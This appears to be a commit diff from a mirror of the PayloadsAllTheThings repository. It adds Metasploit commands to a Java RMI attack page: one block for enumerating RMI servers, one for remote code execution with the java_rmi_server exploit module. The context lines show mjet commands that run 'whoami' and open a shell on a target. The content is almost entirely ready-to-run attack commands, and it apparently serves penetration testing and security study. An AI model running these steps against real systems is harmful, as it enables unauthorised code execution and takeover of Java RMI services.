mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-24 05:15:26 +00:00
commit
34128314d3
@ -64,6 +64,14 @@ $ rmg enum 172.17.0.2 9010
|
||||
[...]
|
||||
```
|
||||
|
||||
Using Metasploit
|
||||
```bash
|
||||
use auxiliary/scanner/misc/java_rmi_server
|
||||
set RHOSTS <IPs>
|
||||
set RPORT <PORT>
|
||||
run
|
||||
```
|
||||
|
||||
## Exploitation
|
||||
|
||||
### RCE using sjet or mjet
|
||||
@ -97,6 +105,15 @@ jython mjet.py TARGET_IP TARGET_PORT command super_secret "whoami"
|
||||
jython mjet.py TARGET_IP TARGET_PORT command super_secret shell
|
||||
```
|
||||
|
||||
### RCE using Metasploit
|
||||
```bash
|
||||
use exploit/multi/misc/java_rmi_server
|
||||
set RHOSTS <IPs>
|
||||
set RPORT <PORT>
|
||||
# configure also the payload if needed
|
||||
run
|
||||
```
|
||||
|
||||
## References
|
||||
|
||||
* [ATTACKING RMI BASED JMX SERVICES - HANS-MARTIN MÜNCH, 28 April 2019](https://mogwailabs.de/en/blog/2019/04/attacking-rmi-based-jmx-services/)
|
||||
|
Loading…
Reference in New Issue
Block a user